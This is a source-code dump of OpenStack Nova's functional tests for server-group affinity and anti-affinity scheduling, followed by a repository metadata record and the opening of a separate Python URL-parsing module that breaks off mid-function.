            existing_groups = self.api.get_server_groups()
            self.assertNotIn(group, existing_groups)

    def test_create_wrong_policy(self):
        """An unknown policy name is rejected with a 400."""
        ex = self.assertRaises(client.OpenStackApiException,
                               self.api.post_server_groups,
                               {'name': 'fake-name-1',
                                'policies': ['wrong-policy']})
        self.assertEqual(400, ex.response.status_code)
        self.assertIn('Invalid input', ex.response.text)
        self.assertIn('wrong-policy', ex.response.text)

    def test_get_groups_all_projects(self):
        # This test requires APIs using two projects.

        # Create an API using project 'openstack1'.
        # This is a non-admin API.
        #
        # NOTE(sdague): this is actually very much *not* how this
        # fixture should be used. This actually spawns a whole
        # additional API server. Should be addressed in the future.
        api_openstack1 = self.useFixture(nova_fixtures.OSAPIFixture(
            api_version=self.api_major_version,
            project_id=PROJECT_ID_ALT)).api
        api_openstack1.microversion = self.microversion

        # Create a server group in project 'openstack'
        # Project 'openstack' is used by self.api
        group1 = self.anti_affinity
        openstack_group = self.api.post_server_groups(group1)

        # Create a server group in project 'openstack1'
        group2 = self.affinity
        openstack1_group = api_openstack1.post_server_groups(group2)

        # The admin should be able to get server groups in all projects.
        all_projects_admin = self.admin_api.get_server_groups(
            all_projects=True)
        self.assertIn(openstack_group, all_projects_admin)
        self.assertIn(openstack1_group, all_projects_admin)

        # The non-admin should only be able to get server groups
        # in his project.
        # The all_projects parameter is ignored for non-admin clients.
        all_projects_non_admin = api_openstack1.get_server_groups(
            all_projects=True)
        self.assertNotIn(openstack_group, all_projects_non_admin)
        self.assertIn(openstack1_group, all_projects_non_admin)

    def test_create_duplicated_policy(self):
        """Repeating the same policy twice is rejected with a 400."""
        ex = self.assertRaises(client.OpenStackApiException,
                               self.api.post_server_groups,
                               {"name": "fake-name-1",
                                "policies": ["affinity", "affinity"]})
        self.assertEqual(400, ex.response.status_code)
        self.assertIn('Invalid input', ex.response.text)

    def test_create_multiple_policies(self):
        """Mixing incompatible policies is rejected with a 400."""
        ex = self.assertRaises(client.OpenStackApiException,
                               self.api.post_server_groups,
                               {"name": "fake-name-1",
                                "policies": ["anti-affinity", "affinity"]})
        self.assertEqual(400, ex.response.status_code)

    def _boot_servers_to_group(self, group, flavor=None):
        """Boot two servers into *group* sequentially and return them."""
        servers = []
        for _ in range(0, 2):
            server = self._boot_a_server_to_group(group,
                                                  flavor=flavor)
            servers.append(server)
        return servers

    def test_boot_servers_with_affinity(self):
        """Affinity members must land on the same compute host."""
        created_group = self.api.post_server_groups(self.affinity)
        servers = self._boot_servers_to_group(created_group)

        members = self.api.get_server_group(created_group['id'])['members']
        host = servers[0]['OS-EXT-SRV-ATTR:host']
        for server in servers:
            self.assertIn(server['id'], members)
            self.assertEqual(host, server['OS-EXT-SRV-ATTR:host'])

    def test_boot_servers_with_affinity_overquota(self):
        # Tests that we check server group member quotas and cleanup created
        # resources when we fail with OverQuota.
        self.flags(quota_server_group_members=1)
        # make sure we start with 0 servers
        servers = self.api.get_servers(detail=False)
        self.assertEqual(0, len(servers))
        created_group = self.api.post_server_groups(self.affinity)
        ex = self.assertRaises(client.OpenStackApiException,
                               self._boot_servers_to_group,
                               created_group)
        self.assertEqual(403, ex.response.status_code)
        # _boot_servers_to_group creates 2 instances in the group in order, not
        # multiple servers in a single request. Since our quota is 1, the first
        # server create would pass, the second should fail, and we should be
        # left with 1 server and its 1 block device mapping.
        servers = self.api.get_servers(detail=False)
        self.assertEqual(1, len(servers))
        ctxt = context.get_admin_context()
        servers = db.instance_get_all(ctxt)
        self.assertEqual(1, len(servers))
        ctxt_mgr = db_api.get_context_manager(ctxt)
        with ctxt_mgr.reader.using(ctxt):
            bdms = db_api._block_device_mapping_get_query(ctxt).all()
        self.assertEqual(1, len(bdms))
        self.assertEqual(servers[0]['uuid'], bdms[0]['instance_uuid'])

    def test_boot_servers_with_affinity_no_valid_host(self):
        created_group = self.api.post_server_groups(self.affinity)
        # Using big enough flavor to use up the resources on the host
        flavor = self.api.get_flavors()[2]
        self._boot_servers_to_group(created_group, flavor=flavor)

        # The third server cannot be booted as there is not enough resource
        # on the host where the first two server was booted
        failed_server = self._boot_a_server_to_group(created_group,
                                                     flavor=flavor,
                                                     expected_status='ERROR')
        self.assertEqual('No valid host was found. '
                         'There are not enough hosts available.',
                         failed_server['fault']['message'])

    def test_boot_servers_with_anti_affinity(self):
        """Anti-affinity members must land on different compute hosts."""
        created_group = self.api.post_server_groups(self.anti_affinity)
        servers = self._boot_servers_to_group(created_group)

        members = self.api.get_server_group(created_group['id'])['members']
        self.assertNotEqual(servers[0]['OS-EXT-SRV-ATTR:host'],
                            servers[1]['OS-EXT-SRV-ATTR:host'])
        for server in servers:
            self.assertIn(server['id'], members)

    def test_boot_server_with_anti_affinity_no_valid_host(self):
        created_group = self.api.post_server_groups(self.anti_affinity)
        self._boot_servers_to_group(created_group)

        # We have 2 computes so the third server won't fit into the same group
        failed_server = self._boot_a_server_to_group(created_group,
                                                     expected_status='ERROR')
        self.assertEqual('No valid host was found. '
                         'There are not enough hosts available.',
                         failed_server['fault']['message'])

    def _rebuild_with_group(self, group):
        """Boot two members into *group*, rebuild the second, and return
        (untouched_server, rebuilt_server).
        """
        created_group = self.api.post_server_groups(group)
        servers = self._boot_servers_to_group(created_group)

        post = {'rebuild': {'imageRef':
                            '76fa36fc-c930-4bf3-8c8a-ea2a2420deb6'}}
        self.api.post_server_action(servers[1]['id'], post)

        rebuilt_server = self._wait_for_state_change(
            self.admin_api, servers[1], 'ACTIVE')

        self.assertEqual(post['rebuild']['imageRef'],
                         rebuilt_server.get('image')['id'])
        return [servers[0], rebuilt_server]

    def test_rebuild_with_affinity(self):
        """Rebuild keeps an affinity member on its original host."""
        untouched_server, rebuilt_server = self._rebuild_with_group(
            self.affinity)
        self.assertEqual(untouched_server['OS-EXT-SRV-ATTR:host'],
                         rebuilt_server['OS-EXT-SRV-ATTR:host'])

    def test_rebuild_with_anti_affinity(self):
        """Rebuild keeps anti-affinity members on separate hosts."""
        untouched_server, rebuilt_server = self._rebuild_with_group(
            self.anti_affinity)
        self.assertNotEqual(untouched_server['OS-EXT-SRV-ATTR:host'],
                            rebuilt_server['OS-EXT-SRV-ATTR:host'])

    def _migrate_with_group_no_valid_host(self, group):
        """Cold-migrating a member must fail when no host satisfies *group*."""
        created_group = self.api.post_server_groups(group)
        servers = self._boot_servers_to_group(created_group)

        post = {'migrate': {}}
        ex = self.assertRaises(client.OpenStackApiException,
                               self.admin_api.post_server_action,
                               servers[1]['id'], post)

        self.assertEqual(400, ex.response.status_code)
        self.assertIn('No valid host found for cold migrate', ex.response.text)

    def test_migrate_with_group_no_valid_host(self):
        for group in [self.affinity, self.anti_affinity]:
            self._migrate_with_group_no_valid_host(group)

    def test_migrate_with_anti_affinity(self):
        # Start additional host to test migration with anti-affinity
        self.start_service('compute', host='host3')

        created_group = self.api.post_server_groups(self.anti_affinity)
        servers = self._boot_servers_to_group(created_group)

        post = {'migrate': {}}
        self.admin_api.post_server_action(servers[1]['id'], post)
        migrated_server = self._wait_for_state_change(
            self.admin_api, servers[1], 'VERIFY_RESIZE')

        self.assertNotEqual(servers[0]['OS-EXT-SRV-ATTR:host'],
                            migrated_server['OS-EXT-SRV-ATTR:host'])

    def test_resize_to_same_host_with_anti_affinity(self):
        """Resizing in place must not trip the anti-affinity policy."""
        self.flags(allow_resize_to_same_host=True)
        created_group = self.api.post_server_groups(self.anti_affinity)
        servers = self._boot_servers_to_group(created_group,
                                              flavor=self.api.get_flavors()[0])

        post = {'resize': {'flavorRef': '2'}}
        server1_old_host = servers[1]['OS-EXT-SRV-ATTR:host']
        self.admin_api.post_server_action(servers[1]['id'], post)
        migrated_server = self._wait_for_state_change(
            self.admin_api, servers[1], 'VERIFY_RESIZE')

        self.assertEqual(server1_old_host,
                         migrated_server['OS-EXT-SRV-ATTR:host'])

    def _get_compute_service_by_host_name(self, host_name):
        """Map a hostname back to the compute service started in setUp."""
        host = None
        if self.compute.host == host_name:
            host = self.compute
        elif self.compute2.host == host_name:
            host = self.compute2
        else:
            raise AssertionError('host = %s does not found in '
                                 'existing hosts %s' %
                                 (host_name, str([self.compute.host,
                                                  self.compute2.host])))

        return host

    def test_evacuate_with_anti_affinity(self):
        created_group = self.api.post_server_groups(self.anti_affinity)
        servers = self._boot_servers_to_group(created_group)

        host = self._get_compute_service_by_host_name(
            servers[1]['OS-EXT-SRV-ATTR:host'])
        host.stop()
        # Need to wait service_down_time amount of seconds to ensure
        # nova considers the host down
        time.sleep(self._service_down_time)

        # Start additional host to test evacuation
        self.start_service('compute', host='host3')

        post = {'evacuate': {'onSharedStorage': False}}
        self.admin_api.post_server_action(servers[1]['id'], post)

        evacuated_server = self._wait_for_state_change(
            self.admin_api, servers[1], 'ACTIVE')

        self.assertNotEqual(evacuated_server['OS-EXT-SRV-ATTR:host'],
                            servers[0]['OS-EXT-SRV-ATTR:host'])

        host.start()

    def test_evacuate_with_anti_affinity_no_valid_host(self):
        created_group = self.api.post_server_groups(self.anti_affinity)
        servers = self._boot_servers_to_group(created_group)

        host = self._get_compute_service_by_host_name(
            servers[1]['OS-EXT-SRV-ATTR:host'])
        host.stop()
        # Need to wait service_down_time amount of seconds to ensure
        # nova considers the host down
        time.sleep(self._service_down_time)

        post = {'evacuate': {'onSharedStorage': False}}
        self.admin_api.post_server_action(servers[1]['id'], post)

        server_after_failed_evac = self._wait_for_state_change(
            self.admin_api, servers[1], 'ACTIVE')

        # assert that after a failed evac the server active on the same host
        # as before
        self.assertEqual(server_after_failed_evac['OS-EXT-SRV-ATTR:host'],
                         servers[1]['OS-EXT-SRV-ATTR:host'])

        host.start()

    def test_evacuate_with_affinity_no_valid_host(self):
        created_group = self.api.post_server_groups(self.affinity)
        servers = self._boot_servers_to_group(created_group)

        host = self._get_compute_service_by_host_name(
            servers[1]['OS-EXT-SRV-ATTR:host'])
        host.stop()
        # Need to wait service_down_time amount of seconds to ensure
        # nova considers the host down
        time.sleep(self._service_down_time)

        post = {'evacuate': {'onSharedStorage': False}}
        self.admin_api.post_server_action(servers[1]['id'], post)

        server_after_failed_evac = self._wait_for_state_change(
            self.admin_api, servers[1], 'ACTIVE')

        # assert that after a failed evac the server active on the same host
        # as before
        self.assertEqual(server_after_failed_evac['OS-EXT-SRV-ATTR:host'],
                         servers[1]['OS-EXT-SRV-ATTR:host'])

        host.start()

    def test_soft_affinity_not_supported(self):
        """Soft policies are rejected before microversion 2.15."""
        ex = self.assertRaises(client.OpenStackApiException,
                               self.api.post_server_groups,
                               {'name': 'fake-name-1',
                                'policies': ['soft-affinity']})
        self.assertEqual(400, ex.response.status_code)
        self.assertIn('Invalid input', ex.response.text)
        self.assertIn('soft-affinity', ex.response.text)
class ServerGroupAffinityConfTest(ServerGroupTestBase):
    """Affinity booting must fail when the affinity filter is not loaded."""

    api_major_version = 'v2.1'

    # Load only anti-affinity filter so affinity will be missing
    _scheduler_default_filters = 'ServerGroupAntiAffinityFilter'

    # Reset the cached support flag so the check re-reads the filter config.
    @mock.patch('nova.scheduler.utils._SUPPORTS_AFFINITY', None)
    def test_affinity_no_filter(self):
        created_group = self.api.post_server_groups(self.affinity)

        failed_server = self._boot_a_server_to_group(created_group,
                                                     expected_status='ERROR')
        self.assertEqual('ServerGroup policy is not supported: '
                         'ServerGroupAffinityFilter not configured',
                         failed_server['fault']['message'])
        self.assertEqual(400, failed_server['fault']['code'])
class ServerGroupAntiAffinityConfTest(ServerGroupTestBase):
    """Anti-affinity booting must fail when its filter is not loaded."""

    api_major_version = 'v2.1'

    # Load only affinity filter so anti-affinity will be missing
    _scheduler_default_filters = 'ServerGroupAffinityFilter'

    # Reset the cached support flag so the check re-reads the filter config.
    @mock.patch('nova.scheduler.utils._SUPPORTS_ANTI_AFFINITY', None)
    def test_anti_affinity_no_filter(self):
        created_group = self.api.post_server_groups(self.anti_affinity)

        failed_server = self._boot_a_server_to_group(created_group,
                                                     expected_status='ERROR')
        self.assertEqual('ServerGroup policy is not supported: '
                         'ServerGroupAntiAffinityFilter not configured',
                         failed_server['fault']['message'])
        self.assertEqual(400, failed_server['fault']['code'])
class ServerGroupSoftAffinityConfTest(ServerGroupTestBase):
    """Soft-affinity booting must fail when its weigher is not loaded."""

    api_major_version = 'v2.1'
    # Soft policies only exist from microversion 2.15 onwards.
    microversion = '2.15'
    soft_affinity = {'name': 'fake-name-4',
                     'policies': ['soft-affinity']}

    def _get_weight_classes(self):
        # Load only soft-anti-affinity weigher so affinity will be missing
        return ['nova.scheduler.weights.affinity.'
                'ServerGroupSoftAntiAffinityWeigher']

    # Reset the cached support flag so the check re-reads the weigher config.
    @mock.patch('nova.scheduler.utils._SUPPORTS_SOFT_AFFINITY', None)
    def test_soft_affinity_no_filter(self):
        created_group = self.api.post_server_groups(self.soft_affinity)

        failed_server = self._boot_a_server_to_group(created_group,
                                                     expected_status='ERROR')
        self.assertEqual('ServerGroup policy is not supported: '
                         'ServerGroupSoftAffinityWeigher not configured',
                         failed_server['fault']['message'])
        self.assertEqual(400, failed_server['fault']['code'])
class ServerGroupSoftAntiAffinityConfTest(ServerGroupTestBase):
    """Soft-anti-affinity booting must fail when its weigher is not loaded."""

    api_major_version = 'v2.1'
    # Soft policies only exist from microversion 2.15 onwards.
    microversion = '2.15'
    soft_anti_affinity = {'name': 'fake-name-3',
                          'policies': ['soft-anti-affinity']}

    def _get_weight_classes(self):
        # Load only soft affinity weigher so soft-anti-affinity will be
        # missing.  (The unused _scheduler_weight_classes class attribute
        # that duplicated this list was removed; the base class only ever
        # consults _get_weight_classes().)
        return ['nova.scheduler.weights.affinity.'
                'ServerGroupSoftAffinityWeigher']

    # Reset the cached support flag so the check re-reads the weigher config.
    @mock.patch('nova.scheduler.utils._SUPPORTS_SOFT_ANTI_AFFINITY', None)
    def test_soft_anti_affinity_no_filter(self):
        created_group = self.api.post_server_groups(self.soft_anti_affinity)

        failed_server = self._boot_a_server_to_group(created_group,
                                                     expected_status='ERROR')
        self.assertEqual('ServerGroup policy is not supported: '
                         'ServerGroupSoftAntiAffinityWeigher not configured',
                         failed_server['fault']['message'])
        self.assertEqual(400, failed_server['fault']['code'])
class ServerGroupTestV215(ServerGroupTestV21):
    """Server-group API tests at microversion 2.15, which introduces the
    soft-affinity and soft-anti-affinity policies.
    """
    api_major_version = 'v2.1'
    microversion = '2.15'
    soft_anti_affinity = {'name': 'fake-name-3',
                          'policies': ['soft-anti-affinity']}
    soft_affinity = {'name': 'fake-name-4',
                     'policies': ['soft-affinity']}

    def setUp(self):
        super(ServerGroupTestV215, self).setUp()
        # Patch the scheduler's support-detection caches so both soft
        # policies always appear supported for this test class.
        soft_affinity_patcher = mock.patch(
            'nova.scheduler.utils._SUPPORTS_SOFT_AFFINITY')
        soft_anti_affinity_patcher = mock.patch(
            'nova.scheduler.utils._SUPPORTS_SOFT_ANTI_AFFINITY')
        self.addCleanup(soft_affinity_patcher.stop)
        self.addCleanup(soft_anti_affinity_patcher.stop)
        self.mock_soft_affinity = soft_affinity_patcher.start()
        self.mock_soft_anti_affinity = soft_anti_affinity_patcher.start()
        self.mock_soft_affinity.return_value = None
        self.mock_soft_anti_affinity.return_value = None

    def _get_weight_classes(self):
        # Both soft weighers are loaded here (unlike the Conf test above).
        return ['nova.scheduler.weights.affinity.'
                'ServerGroupSoftAffinityWeigher',
                'nova.scheduler.weights.affinity.'
                'ServerGroupSoftAntiAffinityWeigher']

    def test_evacuate_with_anti_affinity(self):
        created_group = self.api.post_server_groups(self.anti_affinity)
        servers = self._boot_servers_to_group(created_group)
        host = self._get_compute_service_by_host_name(
            servers[1]['OS-EXT-SRV-ATTR:host'])
        host.stop()
        # Need to wait service_down_time amount of seconds to ensure
        # nova considers the host down
        time.sleep(self._service_down_time)
        # Start additional host to test evacuation
        compute3 = self.start_service('compute', host='host3')
        post = {'evacuate': {}}
        self.admin_api.post_server_action(servers[1]['id'], post)
        evacuated_server = self._wait_for_state_change(
            self.admin_api, servers[1], 'ACTIVE')
        # Anti-affinity must hold after evacuation: the evacuated server
        # may not land on its group mate's host.
        self.assertNotEqual(evacuated_server['OS-EXT-SRV-ATTR:host'],
                            servers[0]['OS-EXT-SRV-ATTR:host'])
        compute3.kill()
        host.start()

    def test_evacuate_with_anti_affinity_no_valid_host(self):
        created_group = self.api.post_server_groups(self.anti_affinity)
        servers = self._boot_servers_to_group(created_group)
        host = self._get_compute_service_by_host_name(
            servers[1]['OS-EXT-SRV-ATTR:host'])
        host.stop()
        # Need to wait service_down_time amount of seconds to ensure
        # nova considers the host down
        time.sleep(self._service_down_time)
        post = {'evacuate': {}}
        self.admin_api.post_server_action(servers[1]['id'], post)
        server_after_failed_evac = self._wait_for_state_change(
            self.admin_api, servers[1], 'ACTIVE')
        # assert that after a failed evac the server active on the same host
        # as before
        self.assertEqual(server_after_failed_evac['OS-EXT-SRV-ATTR:host'],
                         servers[1]['OS-EXT-SRV-ATTR:host'])
        host.start()

    def test_evacuate_with_affinity_no_valid_host(self):
        created_group = self.api.post_server_groups(self.affinity)
        servers = self._boot_servers_to_group(created_group)
        host = self._get_compute_service_by_host_name(
            servers[1]['OS-EXT-SRV-ATTR:host'])
        host.stop()
        # Need to wait service_down_time amount of seconds to ensure
        # nova considers the host down
        time.sleep(self._service_down_time)
        post = {'evacuate': {}}
        self.admin_api.post_server_action(servers[1]['id'], post)
        server_after_failed_evac = self._wait_for_state_change(
            self.admin_api, servers[1], 'ACTIVE')
        # assert that after a failed evac the server active on the same host
        # as before
        self.assertEqual(server_after_failed_evac['OS-EXT-SRV-ATTR:host'],
                         servers[1]['OS-EXT-SRV-ATTR:host'])
        host.start()

    def test_create_and_delete_groups(self):
        groups = [self.anti_affinity,
                  self.affinity,
                  self.soft_affinity,
                  self.soft_anti_affinity]
        created_groups = []
        for group in groups:
            created_group = self.api.post_server_groups(group)
            created_groups.append(created_group)
            self.assertEqual(group['name'], created_group['name'])
            self.assertEqual(group['policies'], created_group['policies'])
            # A freshly created group starts with no members and no metadata.
            self.assertEqual([], created_group['members'])
            self.assertEqual({}, created_group['metadata'])
            self.assertIn('id', created_group)
            group_details = self.api.get_server_group(created_group['id'])
            self.assertEqual(created_group, group_details)
            existing_groups = self.api.get_server_groups()
            self.assertIn(created_group, existing_groups)
        existing_groups = self.api.get_server_groups()
        self.assertEqual(len(groups), len(existing_groups))
        for group in created_groups:
            self.api.delete_server_group(group['id'])
            existing_groups = self.api.get_server_groups()
            self.assertNotIn(group, existing_groups)

    def test_boot_servers_with_soft_affinity(self):
        created_group = self.api.post_server_groups(self.soft_affinity)
        servers = self._boot_servers_to_group(created_group)
        members = self.api.get_server_group(created_group['id'])['members']
        self.assertEqual(2, len(servers))
        self.assertIn(servers[0]['id'], members)
        self.assertIn(servers[1]['id'], members)
        # Soft affinity packs both servers onto one host when possible.
        self.assertEqual(servers[0]['OS-EXT-SRV-ATTR:host'],
                         servers[1]['OS-EXT-SRV-ATTR:host'])

    def test_boot_servers_with_soft_affinity_no_resource_on_first_host(self):
        created_group = self.api.post_server_groups(self.soft_affinity)
        # Using big enough flavor to use up the resources on the first host
        flavor = self.api.get_flavors()[2]
        servers = self._boot_servers_to_group(created_group, flavor)
        # The third server cannot be booted on the first host as there
        # is not enough resource there, but as opposed to the affinity policy
        # it will be booted on the other host, which has enough resources.
        third_server = self._boot_a_server_to_group(created_group,
                                                    flavor=flavor)
        members = self.api.get_server_group(created_group['id'])['members']
        hosts = []
        for server in servers:
            hosts.append(server['OS-EXT-SRV-ATTR:host'])
        self.assertIn(third_server['id'], members)
        self.assertNotIn(third_server['OS-EXT-SRV-ATTR:host'], hosts)

    def test_boot_servers_with_soft_anti_affinity(self):
        created_group = self.api.post_server_groups(self.soft_anti_affinity)
        servers = self._boot_servers_to_group(created_group)
        members = self.api.get_server_group(created_group['id'])['members']
        self.assertEqual(2, len(servers))
        self.assertIn(servers[0]['id'], members)
        self.assertIn(servers[1]['id'], members)
        # Soft anti-affinity spreads the servers across hosts when possible.
        self.assertNotEqual(servers[0]['OS-EXT-SRV-ATTR:host'],
                            servers[1]['OS-EXT-SRV-ATTR:host'])

    def test_boot_servers_with_soft_anti_affinity_one_available_host(self):
        # With only one live host the soft policy degrades gracefully:
        # both servers still boot (on the same host) instead of failing.
        self.compute2.kill()
        created_group = self.api.post_server_groups(self.soft_anti_affinity)
        servers = self._boot_servers_to_group(created_group)
        members = self.api.get_server_group(created_group['id'])['members']
        host = servers[0]['OS-EXT-SRV-ATTR:host']
        for server in servers:
            self.assertIn(server['id'], members)
            self.assertEqual(host, server['OS-EXT-SRV-ATTR:host'])

    def test_rebuild_with_soft_affinity(self):
        untouched_server, rebuilt_server = self._rebuild_with_group(
            self.soft_affinity)
        self.assertEqual(untouched_server['OS-EXT-SRV-ATTR:host'],
                         rebuilt_server['OS-EXT-SRV-ATTR:host'])

    def test_rebuild_with_soft_anti_affinity(self):
        untouched_server, rebuilt_server = self._rebuild_with_group(
            self.soft_anti_affinity)
        self.assertNotEqual(untouched_server['OS-EXT-SRV-ATTR:host'],
                            rebuilt_server['OS-EXT-SRV-ATTR:host'])

    def _migrate_with_soft_affinity_policies(self, group):
        # Boot two servers into the group, cold-migrate the second one and
        # return [new host of migrated server, host of the untouched one].
        created_group = self.api.post_server_groups(group)
        servers = self._boot_servers_to_group(created_group)
        post = {'migrate': {}}
        self.admin_api.post_server_action(servers[1]['id'], post)
        migrated_server = self._wait_for_state_change(
            self.admin_api, servers[1], 'VERIFY_RESIZE')
        return [migrated_server['OS-EXT-SRV-ATTR:host'],
                servers[0]['OS-EXT-SRV-ATTR:host']]

    def test_migrate_with_soft_affinity(self):
        # Migration must move off the shared host, so the hosts now differ.
        migrated_server, other_server = (
            self._migrate_with_soft_affinity_policies(self.soft_affinity))
        self.assertNotEqual(migrated_server, other_server)

    def test_migrate_with_soft_anti_affinity(self):
        # The servers started on different hosts; migrating one lands it on
        # the only other host, i.e. the one its group mate occupies.
        migrated_server, other_server = (
            self._migrate_with_soft_affinity_policies(self.soft_anti_affinity))
        self.assertEqual(migrated_server, other_server)

    def _evacuate_with_soft_anti_affinity_policies(self, group):
        # Boot two servers into the group, take the second server's host
        # down, evacuate it, and return [new host, untouched server's host].
        created_group = self.api.post_server_groups(group)
        servers = self._boot_servers_to_group(created_group)
        host = self._get_compute_service_by_host_name(
            servers[1]['OS-EXT-SRV-ATTR:host'])
        host.stop()
        # Need to wait service_down_time amount of seconds to ensure
        # nova considers the host down
        time.sleep(self._service_down_time)
        post = {'evacuate': {}}
        self.admin_api.post_server_action(servers[1]['id'], post)
        evacuated_server = self._wait_for_state_change(
            self.admin_api, servers[1], 'ACTIVE')
        # Note(gibi): need to get the server again as the state of the instance
        # goes to ACTIVE first then the host of the instance changes to the
        # new host later
        evacuated_server = self.admin_api.get_server(evacuated_server['id'])
        host.start()
        return [evacuated_server['OS-EXT-SRV-ATTR:host'],
                servers[0]['OS-EXT-SRV-ATTR:host']]

    def test_evacuate_with_soft_affinity(self):
        evacuated_server, other_server = (
            self._evacuate_with_soft_anti_affinity_policies(
                self.soft_affinity))
        self.assertNotEqual(evacuated_server, other_server)

    def test_evacuate_with_soft_anti_affinity(self):
        evacuated_server, other_server = (
            self._evacuate_with_soft_anti_affinity_policies(
                self.soft_anti_affinity))
        self.assertEqual(evacuated_server, other_server)

    def test_soft_affinity_not_supported(self):
        # NOTE(review): intentionally overrides the inherited test with a
        # no-op -- presumably because this class configures both soft
        # weighers, so the parent's "not supported" scenario cannot occur.
        # Confirm against ServerGroupTestV21.
        pass
| {
"content_hash": "b172302bbf9f13166a0ac5ed94db896f",
"timestamp": "",
"source": "github",
"line_count": 788,
"max_line_length": 79,
"avg_line_length": 42.954314720812185,
"alnum_prop": 0.6127983928149374,
"repo_name": "cloudbase/nova",
"id": "281fbb4ae1ae943e93fc2e92faf5448f0c5a7b45",
"size": "34475",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "nova/tests/functional/test_server_group.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "PHP",
"bytes": "3325"
},
{
"name": "Python",
"bytes": "18199370"
},
{
"name": "Shell",
"bytes": "37074"
},
{
"name": "Smarty",
"bytes": "299657"
}
],
"symlink_target": ""
} |
"""Parse (absolute and relative) URLs.
See RFC 1808: "Relative Uniform Resource Locators", by R. Fielding,
UC Irvine, June 1995.
"""
__all__ = ["urlparse", "urlunparse", "urljoin", "urldefrag",
"urlsplit", "urlunsplit", "parse_qs", "parse_qsl"]
# A classification of schemes ('' means apply by default)
uses_relative = ['ftp', 'http', 'gopher', 'nntp', 'imap',
'wais', 'file', 'https', 'shttp', 'mms',
'prospero', 'rtsp', 'rtspu', '', 'sftp']
uses_netloc = ['ftp', 'http', 'gopher', 'nntp', 'telnet',
'imap', 'wais', 'file', 'mms', 'https', 'shttp',
'snews', 'prospero', 'rtsp', 'rtspu', 'rsync', '',
'svn', 'svn+ssh', 'sftp']
non_hierarchical = ['gopher', 'hdl', 'mailto', 'news',
'telnet', 'wais', 'imap', 'snews', 'sip', 'sips']
uses_params = ['ftp', 'hdl', 'prospero', 'http', 'imap',
'https', 'shttp', 'rtsp', 'rtspu', 'sip', 'sips',
'mms', '', 'sftp']
uses_query = ['http', 'wais', 'imap', 'https', 'shttp', 'mms',
'gopher', 'rtsp', 'rtspu', 'sip', 'sips', '']
uses_fragment = ['ftp', 'hdl', 'http', 'gopher', 'news',
'nntp', 'wais', 'https', 'shttp', 'snews',
'file', 'prospero', '']
# Characters valid in scheme names
scheme_chars = ('abcdefghijklmnopqrstuvwxyz'
'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
'0123456789'
'+-.')
MAX_CACHE_SIZE = 20
_parse_cache = {}
def clear_cache():
"""Clear the parse cache."""
_parse_cache.clear()
class ResultMixin(object):
    """Shared methods for the parsed result objects.

    Exposes the user/password/host/port sub-components of ``self.netloc``
    (supplied by the named-tuple subclasses) as read-only properties.
    """

    @property
    def username(self):
        """User name from a ``user:password@host`` netloc, or None."""
        netloc = self.netloc
        if "@" in netloc:
            userinfo = netloc.rsplit("@", 1)[0]
            if ":" in userinfo:
                userinfo = userinfo.split(":", 1)[0]
            return userinfo
        return None

    @property
    def password(self):
        """Password from a ``user:password@host`` netloc, or None."""
        netloc = self.netloc
        if "@" in netloc:
            userinfo = netloc.rsplit("@", 1)[0]
            if ":" in userinfo:
                return userinfo.split(":", 1)[1]
        return None

    @property
    def hostname(self):
        """Lower-cased host name without port/userinfo, or None if empty."""
        netloc = self.netloc
        if "@" in netloc:
            netloc = netloc.rsplit("@", 1)[1]
        if ":" in netloc:
            netloc = netloc.split(":", 1)[0]
        return netloc.lower() or None

    @property
    def port(self):
        """Port number as an int, or None when absent.

        Bug fix: an empty port (e.g. 'http://host:/path') previously
        raised ValueError from int('', 10); it now returns None, matching
        later CPython behaviour.
        """
        netloc = self.netloc
        if "@" in netloc:
            netloc = netloc.rsplit("@", 1)[1]
        if ":" in netloc:
            port = netloc.split(":", 1)[1]
            if port:
                return int(port, 10)
        return None
from collections import namedtuple


class SplitResult(namedtuple('SplitResult', 'scheme netloc path query fragment'), ResultMixin):
    """5-tuple result type returned by urlsplit(), with named fields."""

    __slots__ = ()

    def geturl(self):
        # Reassemble the URL (modulo redundant delimiters) via urlunsplit().
        return urlunsplit(self)
class ParseResult(namedtuple('ParseResult', 'scheme netloc path params query fragment'), ResultMixin):
    """6-tuple result type returned by urlparse(), with named fields."""

    __slots__ = ()

    def geturl(self):
        # Reassemble the URL (modulo redundant delimiters) via urlunparse().
        return urlunparse(self)
def urlparse(url, scheme='', allow_fragments=True):
    """Parse a URL into 6 components:
    <scheme>://<netloc>/<path>;<params>?<query>#<fragment>
    Return a 6-tuple: (scheme, netloc, path, params, query, fragment).
    Note that we don't break the components up in smaller bits
    (e.g. netloc is a single string) and we don't expand % escapes."""
    # Renamed the intermediate (previously called 'tuple', which shadowed
    # the builtin of the same name).
    split_result = urlsplit(url, scheme, allow_fragments)
    scheme, netloc, url, query, fragment = split_result
    # Only split ';params' off the path for schemes that actually use them.
    if scheme in uses_params and ';' in url:
        url, params = _splitparams(url)
    else:
        params = ''
    return ParseResult(scheme, netloc, url, params, query, fragment)
def _splitparams(url):
if '/' in url:
i = url.find(';', url.rfind('/'))
if i < 0:
return url, ''
else:
i = url.find(';')
return url[:i], url[i+1:]
def _splitnetloc(url, start=0):
delim = len(url) # position of end of domain part of url, default is end
for c in '/?#': # look for delimiters; the order is NOT important
wdelim = url.find(c, start) # find first of this delim
if wdelim >= 0: # if found
delim = min(delim, wdelim) # use earliest delim position
return url[start:delim], url[delim:] # return (domain, rest)
def urlsplit(url, scheme='', allow_fragments=True):
    """Parse a URL into 5 components:
    <scheme>://<netloc>/<path>?<query>#<fragment>
    Return a 5-tuple: (scheme, netloc, path, query, fragment).
    Note that we don't break the components up in smaller bits
    (e.g. netloc is a single string) and we don't expand % escapes."""
    # Normalize so the cache key is stable regardless of truthy variants.
    allow_fragments = bool(allow_fragments)
    # The types are part of the key so str and unicode inputs (Python 2)
    # don't collide on equal-comparing cache entries.
    key = url, scheme, allow_fragments, type(url), type(scheme)
    cached = _parse_cache.get(key, None)
    if cached:
        return cached
    if len(_parse_cache) >= MAX_CACHE_SIZE: # avoid runaway growth
        clear_cache()
    netloc = query = fragment = ''
    i = url.find(':')
    if i > 0:
        if url[:i] == 'http': # optimize the common case
            # Fast path: duplicate of the generic logic below, but without
            # the scheme_chars scan or the uses_* membership tests.
            scheme = url[:i].lower()
            url = url[i+1:]
            if url[:2] == '//':
                netloc, url = _splitnetloc(url, 2)
            if allow_fragments and '#' in url:
                url, fragment = url.split('#', 1)
            if '?' in url:
                url, query = url.split('?', 1)
